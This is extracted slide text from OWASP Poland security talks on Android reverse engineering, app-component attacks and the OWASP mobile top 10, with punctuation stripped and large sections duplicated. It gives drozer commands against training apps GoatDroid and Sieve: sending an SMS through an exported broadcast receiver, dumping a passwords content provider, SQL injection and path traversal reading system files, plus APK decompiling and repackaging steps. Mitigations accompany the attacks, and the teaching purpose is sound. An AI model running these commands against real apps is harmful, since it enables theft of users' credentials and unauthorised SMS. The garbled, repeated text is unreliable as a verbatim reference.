Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Android Application Security
Often the app contains some sensitive databull Passwordsbull Authentication tokensbull Contactsbull Communication recordsbull IP addresses or domain names to sensitive
services
Android Application Security
Global problems in securing the applicationsbull How sensitive data is storedndash Isolationndash Privilege separation
bull How sensitive data is transmittedndash Extra-device communicationndash Inter-application communicationndash Inter-component communication
Android Application Components
Activities Services
Content providers
Broadcast
receivers
Android Application Components
AndroidManifestxml defines in which way the app works and what kind of interaction between components and outer world is possible Permissions are set there too
bull Activities ndash ltactivitygtbull Services ndash ltservicegtbull Content providers ndash ltprovidergtbull Broadcast receivers ndash ltreceivergt
Android Manifest
Sample manifest fileNote the followingbull Permissions
ltuses-permission androidname=stringgtltpermission androidprotectionLevel=hellip gt
bull Components and their attributes
AndroidManifestxml
Android Manifest
Protection levelsbull dangerous ndash increased risk (directly affect users)bull normal ndash minimal risk (default value)bull signature ndash same certificatebull signatureOrSystem ndash same certificate || app in
Android system image
Android Manifest
bull debuggablebull enabledbull exportedbull permission
Activities Services
Content provider
s
Broadcast
receivers
Example components attributes
IntentsAn intent is a defined object used for messaging that is created and communicated to an intended application component It includes all relevant information about calling application desired application component and request actionsdata
Intent intent = new Intent(IntentACTION_VIEW) intentsetData(Uriparse(httpwwwgooglecom)) String pack = comandroidbrowser ComponentName comp = new ComponentName(pack pack + BrowserActivity)intentsetComponent(comp)
startActivity(intent)
Drozer
Open source tool to interact with other applications through IPC - leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer you donrsquot need to write your apps to interact with other apps )
dzgt run appactivitystart --action androidintentactionVIEW --data-uri httpwwwgooglecom --component comandroidbrowser comandroidbrowserBrowserActivity
DrozerIs installed in a default package of AppUse with adb so enough just bdquoclick-and-playrdquo
Activity components
An Activity provides a screen with which users can interact in order to do something Users can perform operations such as making a call sending an SMS etc
Example login screen of your Facebook app
Activities
Activity components attacks
bull If an activity can be triggered by other apps (by an attacker) it can be abused
bull Launching by intents itrsquos possible to achieve the followingndash Modify data in backgroundndash Tricking the userndash Leaking sensitive information
Activities
Activity components attacksbull General hijacking scheme
bull Results of an attackndash Malicious Activity could read the data in the Intent and then
immediately relay it to a legitimate onendash Spoofing the expected Activityrsquos user interface to steal user-supplied
data (phishing)
A B
E
Activities
Activity components attacks Activities
bull List and launch exported activities
dzgt run appactivityinfo -a commwrexamplesieve Package commwrexamplesieve commwrexamplesieveFileSelectActivity commwrexamplesieveMainLoginActivity commwrexamplesievePWList
dzgt run appactivitystart --component commwrexamplesieve commwrexamplesievePWList
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull 